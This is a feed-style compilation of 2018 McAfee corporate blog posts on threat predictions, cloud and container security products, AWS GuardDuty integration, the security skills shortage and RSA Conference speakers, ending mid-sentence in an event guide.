Children are being introduced to the internet and tech devices earlier than ever before. As exciting as that is, most kids are not properly trained on how to surf the web safely which can pose potential risks to their privacy. This type of exposure led us to predict that in 2018 organizations will begin to collect and leverage digital content generated by children, and parents will be unaware of how much information is out there about their kid.

The Verdict

Though there has been no known incident yet in which a child’s information has been leveraged or compromised, some apps and gadgets have the potential to do so. It was recently reported, that a new app being used by kids is allowing other users to track them by GPS. According to McAfee research, children’s online gaming use could also put them at serious risk of a cyberattack.

Beyond these predictions, there is also a variety of other threats security professionals could be facing in the second half of 2018. Just take VPNFilter, Hidden Cobra, and Gold Dragon for example – all of these attacks have proven that cybercriminals have come out into 2018 swinging. They’re going after high-profile, high stakes industries, and are using deceptive and sly techniques in order to steal information from these targets.

Needless to say, the threat landscape is going to continue to change and evolve throughout 2018. However, no matter how the rest of the year unfolds, we’re confident that cyber defenders are ready to take on any future threat that may come their way.

Hear from our leading researchers from McAfee Labs and Office of the CTO as they share more details into the threat landscape predictions for 2018 in our on-demand webinar.

To learn more about what McAfee is doing to help tackle today’s cyberthreats, be sure to follow us at @McAfee and @McAfee_Labs.

The post Checking In Halfway: The McAfee Labs 2018 Threats Predictions appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/checking-in-halfway-the-mcafee-labs-2018-threats-predictions/feed/ 0
Finals Week: Cloud Edition https://securingtomorrow.mcafee.com/business/cloud-security/finals-week-cloud-edition/ https://securingtomorrow.mcafee.com/business/cloud-security/finals-week-cloud-edition/#respond Tue, 05 Jun 2018 23:00:07 +0000 https://securingtomorrow.mcafee.com/?p=89399 It’s almost summertime—where the nights are longer and the water is warmer! Before we head to the beach it’s time to review all the things we learned about the cloud from the past two quarters. For #CloudFinalsWeek we’re asking you to prove your knowledge on the current climate of cloud computing and security. Will you […]

The post Finals Week: Cloud Edition appeared first on McAfee Blogs.

]]>
It’s almost summertime—where the nights are longer and the water is warmer! Before we head to the beach it’s time to review all the things we learned about the cloud from the past two quarters.

For #CloudFinalsWeek we’re asking you to prove your knowledge on the current climate of cloud computing and security. Will you be valedictorian or be headed back to class for summer school? Share your cloud finals score on Twitter after completing the assessment to see if you outranked your peers.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Navigating a Cloudy Sky

Blog Post: Cloud is Ubiquitous and Untrusted

Good luck!

The post Finals Week: Cloud Edition appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/finals-week-cloud-edition/feed/ 0
Come Talk to McAfee at the Gartner Security and Risk Management Summit https://securingtomorrow.mcafee.com/business/come-talk-to-mcafee-at-the-gartner-security-and-risk-management-summit/ https://securingtomorrow.mcafee.com/business/come-talk-to-mcafee-at-the-gartner-security-and-risk-management-summit/#respond Mon, 04 Jun 2018 18:56:44 +0000 https://securingtomorrow.mcafee.com/?p=89290 This blog was written by Peter Elliman. A wide group of experts from McAfee will be attending the Gartner Security & Risk Management Summit from June 4-7 in National Harbor, Maryland. The summit brings together an estimated 3400 attendees and over 200 exhibitors looking to share their vision, stories and capabilities with a wider range […]

The post Come Talk to McAfee at the Gartner Security and Risk Management Summit appeared first on McAfee Blogs.

]]>
This blog was written by Peter Elliman.

A wide group of experts from McAfee will be attending the Gartner Security & Risk Management Summit from June 4-7 in National Harbor, Maryland. The summit brings together an estimated 3400 attendees and over 200 exhibitors looking to share their vision, stories and capabilities with a wider range of cybersecurity and risk management experts. Personally, I’m looking forward to sessions on Security Operations, Management and Orchestration,

Join us on Tuesday, June 5th from 10:30-11:15, for a session entitled Appetite for Destruction – The Cloud Edition, given by Rajiv Gupta, SVP of the Cloud Security Business Unit and Raj Samani (@Raj_Samani), Chief Scientist and McAfee Fellow. Raj and Rajiv will examine the evolving threat landscape in 2018 and how the cloud will increasingly come under fire.

Looking to hear more about our view on cloud security? One of our system engineers, Will Aranha, a DC native from Skyhigh, now part of McAfee, will give a great session entitled Cloud Security in the Era of “There’s an App for That. While it takes place on Monday, June 4th, the same day this blog was published, swing by the booth if you want a summary or a follow-up on the slides he presented. If you’re reading this in time – head to George’s Hall D by 1:50pm.

Speaking of our booth, I have to encourage you to visit McAfee at booth #436. Talking to experts 1:1 is one of the best ways to get educated and answer questions. My hope is that you’ll walk away with a bigger and broader vision of what McAfee can do. We call it our Device to Cloud protection vision.

Better yet see live demos of both updated and new products. We’ll have 4 stations centered on the following:

Endpoint Security – Protecting against advanced and fileless threats is important, but you also need context on threat trends (not just EDR) and the ability respond quickly and efficiently (a single security management console called ePO makes it easier). Find out what the new McAfee is doing differently in this space.

Evolve Your Security Operations – Wondering why you can’t get more out of your SIEM? Wish you had a few more tier 2 or tier 3 security analysts on staff? See how analytics and machine-learning can transform how every analyst, regardless of their level, can find threats and make decisions faster. Here’s a screen shot from our Mock SOC demo that gives you a taste of how both McAfee Behavior Analytics and McAfee Investigator can transform your team.

McAfee Behavioral Analytics (MBA) screen shot that shows a high-risk user and the reason for the rating. MBA uses machine-learning to model users and organizational behavior.

The beginning of an investigation with McAfee Investigator as shown in the mock SOC demo (the red box highlights a guided investigation). Turns an analyst into a real Sherlock Holmes.

Data Center & Cloud DefenseIf you’re like most enterprises, you’ve got some workloads running in a hybrid cloud. The team here will show you how to make protection fast and easy through things like automated workload and container discovery, cloud-optimized threat defense, and network visibility and micro-segmentation. A recent SANS endpoint survey (a multi-vendor effort) showed the network as 1 of 3 top areas where respondents detected compromises.

McAfee Skyhigh Security Cloud (CASB)Your teams are working the in cloud which makes securing the areas where they work (e.g., Office 365, AWS, Azure, Box, Salesforce, Slack, and others) important. The team will help you better understand everything from DLP to collaboration control policies to detecting compromised accounts in cloud environments.

Click here to find out how MGM Resorts International uses McAfee solutions, including the McAfee SIEM and Investigator products, to significantly reduce detection and response times. Select benefits included:

  • Improved security posture through well-orchestrated integration and intelligence sharing
  • Accelerated time and reduced effort to contain, investigate, and remediate advanced threats
  • Improved collaboration and skills of security investigation team

Stop by our booth (#436) to hear about more customers and use cases. If you can’t make it to the show, I encourage you to reach out to learn more about the innovation occurring at the new McAfee.

The post Come Talk to McAfee at the Gartner Security and Risk Management Summit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/come-talk-to-mcafee-at-the-gartner-security-and-risk-management-summit/feed/ 0
The Ramifications of the Skills Shortage on Cloud Security https://securingtomorrow.mcafee.com/business/cloud-security/the-ramifications-of-the-skills-shortage-on-cloud-security/ https://securingtomorrow.mcafee.com/business/cloud-security/the-ramifications-of-the-skills-shortage-on-cloud-security/#respond Wed, 30 May 2018 15:00:54 +0000 https://securingtomorrow.mcafee.com/?p=89110 Week over week, a new threat against valuable data emerges. Sometimes, adversaries in cybersecurity find ways to infiltrate systems through advanced malware strains. Other times, they’ll find holes in an organization’s infrastructure, which have been accidentally created by a well-intentioned employee. Both occur all too often, but the latter is actually tied to another threat […]

The post The Ramifications of the Skills Shortage on Cloud Security appeared first on McAfee Blogs.

]]>
Week over week, a new threat against valuable data emerges. Sometimes, adversaries in cybersecurity find ways to infiltrate systems through advanced malware strains. Other times, they’ll find holes in an organization’s infrastructure, which have been accidentally created by a well-intentioned employee. Both occur all too often, but the latter is actually tied to another threat facing the cybersecurity industry – the skills shortage.

Mind the gap

The skills shortage is a term those in the industry all are too familiar with. While agile and powerful threats are on the rise, the amount of talented cybersecurity professionals is not – leaving a gaping hole in security strategy that existing employees just can’t fill. In fact, according to McAfee’s recent study Winning the Game, IT leaders report needing to increase their security staff by 24% to adequately manage their organization’s cyberthreats. The absence of adequately trained professionals can leave holes in many aspects of modern-day security infrastructure, with one of the widest specifically involving cloud security.

A clouded education

The cloud is a nuanced area in technology and securely managing it requires specific knowledge – which is why it feels the effects of the skills shortage two-fold. In fact, according to our recent report Navigating a Cloudy Sky: Practical Guidance and the State of Cloud Security, more than 25% of organizations using infrastructure as a service (IaaS) or software as a service (SaaS) have experienced data theft from their hosted infrastructure or applications. Furthermore, one in five were infiltrated by advanced attackers targeting their public cloud infrastructures. All too often these attacks originate from user misconfigurations, a lack of updates, or a selection of the wrong technology.

Put two and two together, and these breaches make one thing apparent: organizations are not only lacking cybersecurity talent, but sufficient cloud security talent, which ultimately puts them more at risk of an attack. Mind you, this talent gap is also delaying enterprise migration to cloud computing.

Security skills vs. cloud security skills

However, it’s important to note that the list of skills required for successful cloud security isn’t precisely a carbon copy of what many expect from a cybersecurity professional. Plugging one gap will not always fill the other.

Of course, general security skills – such as incident response, data analysis, and threat hunting –are still crucial when it comes to securing the cloud. But they’re not entirely sufficient. For instance, cloud security professionals and architects need to come to the table with a deep knowledge of identity access management (IAM), deployment automation, and cloud regulatory compliance.

But just like cloud security is a shared responsibility between vendor and customer, so is the cloud security skills shortage between the cybersecurity industry and future professionals. While we must hope that professionals pursue the right training, the cybersecurity industry must also do its part in educating both future candidates and current employees on the ins and outs of modern-day cloud security. And this doesn’t just mean teaching the correct configurations for AWS either, but rather helping these professionals learn about the tenets of cloud adoption, including costs, monitoring, potential barriers, and more.

To plug your cloud security skills gap, the answer is not to hire quickly, but rather hire and train strategically. Evaluate what security issues your cloud infrastructure has faced and map those issues back to the applicable skills needed to address them. From there, securing IaaS and SaaS solutions shouldn’t seem so cloudy to your IT team.

To learn more about what McAfee is doing to help address the cybersecurity skills shortage, be sure to follow us at @McAfee and @McAfee_Business.

The post The Ramifications of the Skills Shortage on Cloud Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/the-ramifications-of-the-skills-shortage-on-cloud-security/feed/ 0
McAfee Showcases ESM-TYCHON Cyber Scorecard at Security Through Innovation Summit https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/mcafee-showcases-esm-tychon-cyber-scorecard-at-security-through-innovation-summit/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/mcafee-showcases-esm-tychon-cyber-scorecard-at-security-through-innovation-summit/#respond Tue, 22 May 2018 15:53:14 +0000 https://securingtomorrow.mcafee.com/?p=89005 On Tuesday, May 22, McAfee will host the 2018 Security Through Innovation Summit at the Willard Intercontinental Hotel in Washington, D.C. The half-day event will showcase a dynamic lineup of private and public sector experts addressing the key issues central to the future of federal cybersecurity and IT. This year’s showcase features the latest certified […]

The post McAfee Showcases ESM-TYCHON Cyber Scorecard at Security Through Innovation Summit appeared first on McAfee Blogs.

]]>
On Tuesday, May 22, McAfee will host the 2018 Security Through Innovation Summit at the Willard Intercontinental Hotel in Washington, D.C. The half-day event will showcase a dynamic lineup of private and public sector experts addressing the key issues central to the future of federal cybersecurity and IT.

This year’s showcase features the latest certified McAfee Security Innovation Alliance (SIA) integration combining McAfee Enterprise Security Manager (ESM) 10.3 with TYCHON, an enterprise endpoint management and endpoint detection and response (EDR) technology developed by Tychon LLC (Tychon). This combined solution addresses the U.S. Department of Defense (DoD) Cyber Scorecard mandate, which measures progress on targets set in DoD’s Cybersecurity Discipline Implementation plan released in 2015. The plan identified key tasks related to proper cyber management, such as requiring strong user authentication, removing outdated software and internet-facing web servers that no longer have an operational requirement, and properly aligning networks and information systems.

Of course, all these tasks require resources, and according to the recent McAfee report, Hacking the Skills Shortage, demand for cybersecurity professionals is outpacing the supply of qualified workers. However, nine out of 10 respondents said that cybersecurity technology could help compensate for a skills shortage. The shortage of qualified workers coupled with the vast number of cyber threats facing organizations highlights the need for integrated solutions that achieve more with fewer resources.

In combination with McAfee Policy Auditor, TYCHON provides real-time actionable information needed to populate the complete DoD Cyber Scorecard. The ESM-TYCHON integration enables McAfee customers to visualize the ten threat assessment items presented in the Cyber Scorecard via dynamic dashboards in real-time, including a Summary Dashboard presented by ESM, and a Detail Dashboard powered by TYCHON.

Specifically, the Detail Dashboard presents the status of each of the following:

  • Web Server Public Key Infrastructure (PKI)
  • User Logon
  • Host Based Security System (HBSS) Services
  • STIG Compliance
  • Microsoft Windows Patches
  • Linux/OSX Updates
  • System Compliance

Together, the McAfee-Tychon integration facilitates effective cyber incident response by providing executive summaries (overall scores) of an organization’s assets (endpoints) and reporting asset benchmark results. The Scorecard can filter data by asset, organizational group, and task results.

Such capabilities provide a critical advantage when organizations must maximize their teams’ abilities to effectively detect threats, reduce risks and ensure compliance. This latest McAfee SIA partner integration with Tychon offers customers a certified, integrated solution that allows them to resolve threats faster with fewer resources.

McAfee recently announced 19 new partners to the McAfee SIA program, and seven newly certified, integrated solutions. This partner ecosystem helps accelerate the development of open and interoperable security products, simplify integration with complex customer environments, and provide a truly integrated, connected security ecosystem to maximize the value of existing customer security investments.

Please visit our McAfee SIA page for more information on program partners, certified solutions, and membership details.

Please visit Tychon for more information on the TYCHON technology.

Please visit our Security Through Innovation Summit site for more information on this week’s public sector IT event.

The post McAfee Showcases ESM-TYCHON Cyber Scorecard at Security Through Innovation Summit appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/mcafee-showcases-esm-tychon-cyber-scorecard-at-security-through-innovation-summit/feed/ 0
Enriching Cloud Threat Intelligence and Visibility – Cloud Workload Security and AWS GuardDuty https://securingtomorrow.mcafee.com/business/cloud-security/enriching-cloud-threat-intelligence-and-visibility-cloud-workload-security-and-aws-guardduty/ https://securingtomorrow.mcafee.com/business/cloud-security/enriching-cloud-threat-intelligence-and-visibility-cloud-workload-security-and-aws-guardduty/#respond Fri, 18 May 2018 21:28:22 +0000 https://securingtomorrow.mcafee.com/?p=88953 This blog was written by Stan Golubchik. Using cloud-native threat intelligence to enhance workload security Risk assessment is crucial in today’s public cloud. In Amazon Web Services (AWS), native monitoring services for ingress and egress network data can shed light on potential network threats and anomalies. A service of AWS, GuardDuty, bridges the capability to […]

The post Enriching Cloud Threat Intelligence and Visibility – Cloud Workload Security and AWS GuardDuty appeared first on McAfee Blogs.

]]>
This blog was written by Stan Golubchik.

Using cloud-native threat intelligence to enhance workload security

Risk assessment is crucial in today’s public cloud. In Amazon Web Services (AWS), native monitoring services for ingress and egress network data can shed light on potential network threats and anomalies. A service of AWS, GuardDuty, bridges the capability to ingest this data to and from an AWS tenant’s environments for continuous monitoring of the following data sources:

  • VPC Flow Logs
  • AWS CloudTrail event logs
  • DNS logs

With these threat intelligence feeds, GuardDuty can enrich the context of potentially unauthorized and malicious activity within a AWS environment. This context can be visualized through the GuardDuty console, or via the Amazon CloudWatch events, informing the security status of your AWS environment.

While GuardDuty can act as a standalone service with substantial benefit for security and risk assessment in an AWS environment, converging GuardDuty threat intelligence into a broader cloud workload protection platform can provide extended benefits:

  • Automated detection capabilities
  • A single pane of glass for visibility over AWS, along with Azure and VMware
  • Actionable remediation workflows

By bridging native AWS API driven data sources such as GuardDutty with a cloud workload protection platform like McAfee Cloud Workload Security (CWS), tenants of AWS can use the data-rich sources of AWS within CWS manage and secure mission critical workloads with advanced security from a single console.

Discover and protect with Cloud Workload Security

CWS directly integrates with the AWS GuardDuty API – An optimal scenario for visualizing anomalous network activity, and threat events. GuardDuty events which are categorized as low and medium events within AWS are subsequently flagged as medium severity events within the CWS console.

Setting up the connection between GuardDuty and McAfee CWS is straight forward. The pre-requisite configuration requirements are as follows:

  • Enable GuardDuty through your AWS management console.

  • The security credentials used for registering your account within CWS should have GuardDuty permissions assigned for read access to GuardDuty’s threat intelligence and network flow data.

Once the initial configuration has been instantiated, GuardDuty data will immediately be pulled by CWS.  Through the CWS management console (McAfee ePolicy Orchestrator, or ePO), you are able to visualize threat information directly from GuardDuty. The GuardDuty events you will see include:

  • Brute force attacks
  • Port scans
  • Tor communications
  • SSH brute force
  • Outbound DDoS
  • Bitcoin mining
  • Unusual DNS requests
  • Unusual traffic volume and direction

IAM related events are currently not supported. An immediate pivot into an action can be taken at the point GuardDuty provides a severity verdict to a potential threat. Such actions which can be taken include:

  • Shutting down the compromised EC2 instance(s) which have been flagged.
  • Through micro-segmentation, altering firewall settings via security groups i.e. altering the port, protocol, or IP to limit and control network connectivity to any EC2 instance.

For more information on McAfee Cloud Workload Security, please visit the following page for feature and solution documentation: https://www.mcafee.com/us/products/cloud-workload-security.aspx

 

The post Enriching Cloud Threat Intelligence and Visibility – Cloud Workload Security and AWS GuardDuty appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/enriching-cloud-threat-intelligence-and-visibility-cloud-workload-security-and-aws-guardduty/feed/ 0
McAfee vNSP and AWS Are Winning Combination for Enterprise and Federal Customers https://securingtomorrow.mcafee.com/business/mcafee-vnsp-and-aws-are-winning-combination-for-enterprise-and-federal-customers/ https://securingtomorrow.mcafee.com/business/mcafee-vnsp-and-aws-are-winning-combination-for-enterprise-and-federal-customers/#respond Fri, 20 Apr 2018 15:00:28 +0000 https://securingtomorrow.mcafee.com/?p=88583 Fun Facts: ECS stood up and managed the first security operations center at the White House. Today, ECS manages the world’s largest McAfee installation—employing just about every solution we make—for the U.S. Army. ECS is more than a McAfee Platinum Partner: they’ve built their entire security solution around McAfee products. The company’s unique offering to […]

The post McAfee vNSP and AWS Are Winning Combination for Enterprise and Federal Customers appeared first on McAfee Blogs.

]]>
Fun Facts: ECS stood up and managed the first security operations center at the White House. Today, ECS manages the world’s largest McAfee installation—employing just about every solution we make—for the U.S. Army.

ECS is more than a McAfee Platinum Partner: they’ve built their entire security solution around McAfee products. The company’s unique offering to Enterprise, military, intelligence and federal civilian combines their award-winning managed services powered by McAfee, and high-level competencies across the Amazon Web Services (AWS) product suite.

ECS has earned service delivery certifications for every McAfee product, participating regularly in betas and trials of new software with active input into the development of new products. Its AWS bona fides are equally ambitious: ECS is an AWS Premier Consulting Partner, an Audited Managed Service Partner, and one of the world’s largest AWS resellers.

For the past 17 years, ECS (formerly InfoReliance) has built a managed-services offering that focuses on delivering custom solutions for clients in regulated industries such as government and defense, but the company also has a large and growing roster of high-profile enterprise and commercial customers. ECS focuses its security solutions around the threat defense lifecycle, applying not only McAfee products but complementary solutions from McAfee Security Innovation Alliance.

“Our choice to provide a single-vendor security platform and deliver McAfee at scale is one of the things that makes us unique,” remarks Andy Woods, Director of Managed Cybersecurity at ECS. “It means our organization can have a depth of expertise that’s frankly unmatched by anyone else in the industry. We also believe it’s the best way to be technology-heavy and people-light, and to automate as much of the cybersecurity lifecycle as we can.”

The McAfee Virtual Network Security Platform (vNSP) and its tight synergy with AWS is a large focus of ECS’s business. Tim Gonda, ECS security engineer and vNSP expert, explains: “We feel it is important to recognize that as part of the AWS shared responsibility model, it is up to us to ensure the security of our virtual networks. We leverage vNSP as a way to augment the security of native AWS capabilities. We are able to establish more flexible controls for protecting our own workloads, as well as providing custom-tailored solutions to our clients.”

In one example of a customer’s virtual private cloud (VPC) deployment, the ECS team launched a vNSP controller into the VPC, and deployed sensors per subnet. The application service also included the lightweight, host-based traffic redirector. “One of the biggest differentiators of vNSP versus other products is that it allows us to monitor internal VPC traffic, as well as traffic leaving the VPC, in an extremely lightweight framework,” Gonda comments. “In this example, we managed the lateral traffic within the VPC, as well as traffic going out to the internet, while providing custom filters and rules looking for specific threats on the wire.”

The application of vNSP with AWS-driven VPCs is just one example of ECS’s fearless innovation in today’s marketplace. Woods notes, “We’re proud of our internally developed intellectual properties, such as our iRamp billing system. We developed one of the very first DXL-enabled technologies within the partner community. We were also early adopters of integrated security through McAfee ePO, born out of a need to support clients in regulated industries.”

Woods concludes, “Our clients are focused on value management of their cybersecurity spend and how we can help them reduce their risk not only today but into the future. We deliver security customized security outcomes for every organization we work with. We’re confident in McAfee’s ability to scale along with core competencies on the endpoint, whether on-premises or in the cloud. The connected infrastructure is a key differentiator for us as we deliver managed services to customers across all verticals. For us, ‘Together is Power’ means being able to solve our clients’ cybersecurity problems in the most powerful manner possible, through a single platform of connected technologies.”

The post McAfee vNSP and AWS Are Winning Combination for Enterprise and Federal Customers appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-vnsp-and-aws-are-winning-combination-for-enterprise-and-federal-customers/feed/ 0
Cloud Protection Moves Into a New Phase https://securingtomorrow.mcafee.com/business/cloud-security/cloud-protection-moves-into-a-new-phase/ https://securingtomorrow.mcafee.com/business/cloud-security/cloud-protection-moves-into-a-new-phase/#respond Mon, 16 Apr 2018 03:50:34 +0000 https://securingtomorrow.mcafee.com/?p=88382 This blog post was written by Sandy Orlando. It’s RSA Conference season and a great time to talk about containers and security. No, not traditional shipping containers. Containers have become developers’ preferred deployment model for modern cloud applications, helping organizations accelerate innovation and differentiate themselves in the marketplace. This is part of the natural progression […]

The post Cloud Protection Moves Into a New Phase appeared first on McAfee Blogs.

]]>
This blog post was written by Sandy Orlando.

It’s RSA Conference season and a great time to talk about containers and security.

No, not traditional shipping containers.

Containers have become developers’ preferred deployment model for modern cloud applications, helping organizations accelerate innovation and differentiate themselves in the marketplace. This is part of the natural progression of the datacenter, moving from the physical, on-premise servers of old, to virtual servers, and then to the public cloud.

According to a report released today by McAfee, “Navigating a Cloudy Sky,” containers have grown rapidly in popularity over the past few years, with 80 percent of those surveyed using or experimenting with them. However, only 66 percent of organizations have a strategy to apply security to containers, so there is still work to be done.

Realistically, most companies will have a mixed, or “hybrid cloud” solution for some time. A big challenge for customers is to maintain security and visibility as they migrate to the public cloud and adopt new technologies like containers.

As containers gain in popularity, getting visibility of their container workloads and understanding how security policies are applied is something that enterprises will need to assess to ensure workloads are secure in the cloud. In the shared security responsibility model laid out by cloud providers, enterprises can leverage the available native controls and the interconnectivity with production workloads and data stores, but will need to actively manage the security of those workloads. Gaining visibility, mitigating risk and protecting container workloads helps build a strong foundation for secure container initiatives.

McAfee is helping to fill the security need in this new environment by offering hybrid cloud security solutions to customers. For example, the release of McAfee Cloud Workload Security (CWS) v5.1 – announced today and available Q2 2018 – gives customers a tool that identifies and secures Docker containers, workloads and servers in both private and public cloud environments.

McAfee CSW 5.1 quarantines infected workloads and containers with a single click, thus reducing misconfiguration risk and increasing initial remediation efficiency by nearly 90 percent.

Previously, point solutions were needed to help secure containers. But with multiple technologies to control multiple environments, security management faced unnecessary complexities. McAfee CWS can span multi-cloud environments: private data centers using virtual VMware servers, workloads in AWS, and workloads in Azure, all from a single interface.

McAfee CWS identifies Docker containers within five minutes from their deployment and quickly secures them using micro and nano-segmentation, with a new interface and workflow. Other new features include discovery of Docker containers using Kubernetes, a popular open source platform used to manage containerized workloads and services, and enhanced threat monitoring and detection with AWS GuardDuty alerts – available directly within the CWS dashboard.

McAfee is the first company to provide a comprehensive cloud security solution that protect both data and workloads across the entire Software as a Service and Infrastructure as a Service spectrum.  So, when you’re talking containers, be sure to include McAfee in the conversation.

And don’t forget to stop by the McAfee booth, North Hall, #3801, if you’re attending RSA.

The post Cloud Protection Moves Into a New Phase appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cloud-security/cloud-protection-moves-into-a-new-phase/feed/ 0
RSA Influencers Identify Cybersecurity’s Top Issues https://securingtomorrow.mcafee.com/business/rsa-influencers-identify-cybersecuritys-top-issues/ https://securingtomorrow.mcafee.com/business/rsa-influencers-identify-cybersecuritys-top-issues/#respond Sun, 15 Apr 2018 21:00:34 +0000 https://securingtomorrow.mcafee.com/?p=88357 More interest, more news, and more money are swirling through the cybersecurity industry than perhaps ever before. Data breaches make headlines, shape elections, and lead to Congressional hearings. Artificial intelligence tools wow the public and stretch the limits of the imagination. And the 40,000 RSA Conference attendees pouring into San Francisco are not impressed. Cybersecurity […]

The post RSA Influencers Identify Cybersecurity’s Top Issues appeared first on McAfee Blogs.

]]>
More interest, more news, and more money are swirling through the cybersecurity industry than perhaps ever before. Data breaches make headlines, shape elections, and lead to Congressional hearings. Artificial intelligence tools wow the public and stretch the limits of the imagination.

And the 40,000 RSA Conference attendees pouring into San Francisco are not impressed. Cybersecurity is a profession, they say, not a circus.

We reached out to RSA speakers and attendees and asked what they think is the most relevant recent development in cybersecurity. They gave us a variety of answers, many with the central theme that companies and consumers should not believe the hype. Cybersecurity still is – and perhaps always will be – about seasoned professionals patiently applying good tools in a comprehensive way.

“The problem we’re seeing at trade shows recently is there is very little new,” said John Bambenek, a vice president at ThreatSTOP who lectures on cybersecurity at the University of Illinois. “We’re still trying to solve the same old problems in the same ways with newish looking packaging. What’s being overlooked is actually spending the time developing understanding of attacks, threats, and trends so models can be truly informed before making decisions.”

Caroline Wong, Vice President of Security Strategy at Cobalt, agreed. You can’t just turn the latest tools on and watch them vanquish threats. “There’s a big push in DevSecOps for more and more automation, but it’s critical to remember that when it comes to web applications and APIs, manual pen testing is required to discover vulnerabilities in application business logic. Automated scans often miss the most interesting security vulnerabilities.”

 

 

“Automated scans often miss the most interesting security vulnerabilities.”

– Caroline Wong, Cobalt

“Assuming that machine learning models and classifiers will work 100% of the time is setting your SOC up to fail,” wrote McAfee CISO Grant Bourzikas in an RSA blog post titled, “What humans do better than machines.” Bourzikas and McAfee Chief Human Resources Officer Chatelle Lynch will host a session at RSA on how innovation can help companies retain top talent. “Recruiting and retaining a diverse talent pool in cybersecurity today is so competitive,” Lynch said of her session. “Employees want to know they are at a company that strives for the latest innovation.” But that is always within the realm of human-machine teaming at McAfee, Bourzikas says. Shiny new tech must be paired with human analysis.

Many cited human decisions about data regulation – the opposite of whiz-bang security tech – as one of the main issues in cybersecurity today.

“The most important development in cybersecurity is Facebook’s reaction to the imminent enforcement of GDPR,” says Kevin L. Jackson, Founder and CEO of GovCloud Network. “The sound of Facebook’s leadership failure is deafening. The legal battles around data privacy and security will drive whatever happens across the entire cybersecurity landscape, including what technology is deployed.”

 

 

“The sound of Facebook’s leadership failure is deafening.”

– Kevin L. Jackson, GovCloud Network

Kathy Delaney Winger, a Tucson-based lawyer whose areas of practice include cybersecurity, concurred. “Businesses may be surprised to learn that they are obligated to comply with laws such as New York’s cybersecurity regulation and the GDPR – even though they do not fall under the jurisdiction of the enacting entities.”

 

“Far too many small and mid-size businesses simply underestimate the impact that the EU General Data Protection Regulation will have on them,” said Ben Rothke, principal security consultant for Nettitude.

 

 

GDPR preparation doesn’t have to be drudgery. Flora Garcia, a McAfee attorney writing about the regulations, has suggested GDPR can also stand for Great Data Protection Rocks. Data protection could even be a shared global citizenship effort along the lines of environmentalism, she says.

 

The data-protection revolution may even have us rethinking the nature of identity. “The identity industry is moving away from identity,” said Steve Wilson, vice president and principal analyst of Constellation Research, Inc. “What matters in authentication? Not who someone is, but what they are. You need to know something specific about a counter-party, like their age, or their address, or their credit card number, or their nationality, or some mix of these things. You don’t really need to know their identity. This is a very fundamental shift in thinking, and it’s just the beginning of a major regulatory push around data provenance.”

 

“The identity industry is moving away from identity.”

– Steve Wilson, Constellation Research, Inc.

Grounded data-protection hygiene and cybersecurity discipline that looks past the cool factor are not preventing RSA attendees from looking at the very latest threats. “These days, attackers are increasingly focused on cryptocurrencies – stealing them, mining them via cryptojacking or obtaining them as ransom,” said Nick Bilogorskiy, who drives cybersecurity strategy at Juniper Networks and was previously Chief Malware Expert at Facebook. “As companies do not usually have crypto wallets to steal, attackers turn to ransomware because it provides the best bang for the buck and is the logical choice for attackers to monetize business breaches. I expect ransomware and other cryptocurrency malware attacks to grow in popularity this year.”

But even the most quickly evolving threats are enterprises launched by people, aimed at people, and shut down by people. Raj Samani, McAfee’s Chief Scientist, says ransomware and its many forms can be beaten by people – if they get the right help. “The purpose of pseudo-ransomware is typically destruction, but we have seen evidence of its use as a diversionary tactic, and whilst it may appear as traditional ransomware the attackers are unlikely to provide any decryption capability regardless whether the ransom is paid. Either way, with actual ransomware or the decoy tactic, organizations need guidance to mitigate the risk.” Samani is speaking about pseudo-ransomware during his session on the topic at RSA.

Everything in cybersecurity may seem new, baffling, and roiling with change. But people can apply lessons of the past – such as with airport security changes after 9/11 – to find solutions in the future, said McAfee CEO Chris Young. “Smart security changed air travel from top to bottom. We need to bring a cybersecurity paradigm shift that is more collaborative, clear and accessible,” Young said of his RSA keynote on what cybersecurity can learn from those who keep air travel safe.

 

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post RSA Influencers Identify Cybersecurity’s Top Issues appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/rsa-influencers-identify-cybersecuritys-top-issues/feed/ 0
A Guide to McAfee at RSA 2018 https://securingtomorrow.mcafee.com/business/guide-mcafee-rsa-2018/ https://securingtomorrow.mcafee.com/business/guide-mcafee-rsa-2018/#respond Fri, 06 Apr 2018 17:00:31 +0000 https://securingtomorrow.mcafee.com/?p=88258 As the RSA Conference convenes more than 40,000 April 16-19 at Moscone Center in San Francisco, cybersecurity has perhaps never been so vital, diverse, and wide-ranging. To help make sense of that, McAfee speakers at RSA will look back at influences that shaped this world, ahead to new innovations and management approaches, and deeply into […]

The post A Guide to McAfee at RSA 2018 appeared first on McAfee Blogs.

]]>
As the RSA Conference convenes more than 40,000 April 16-19 at Moscone Center in San Francisco, cybersecurity has perhaps never been so vital, diverse, and wide-ranging. To help make sense of that, McAfee speakers at RSA will look back at influences that shaped this world, ahead to new innovations and management approaches, and deeply into the worst cyber threats of today.

Keynote: CEO Chris Young looks back at airline security flight

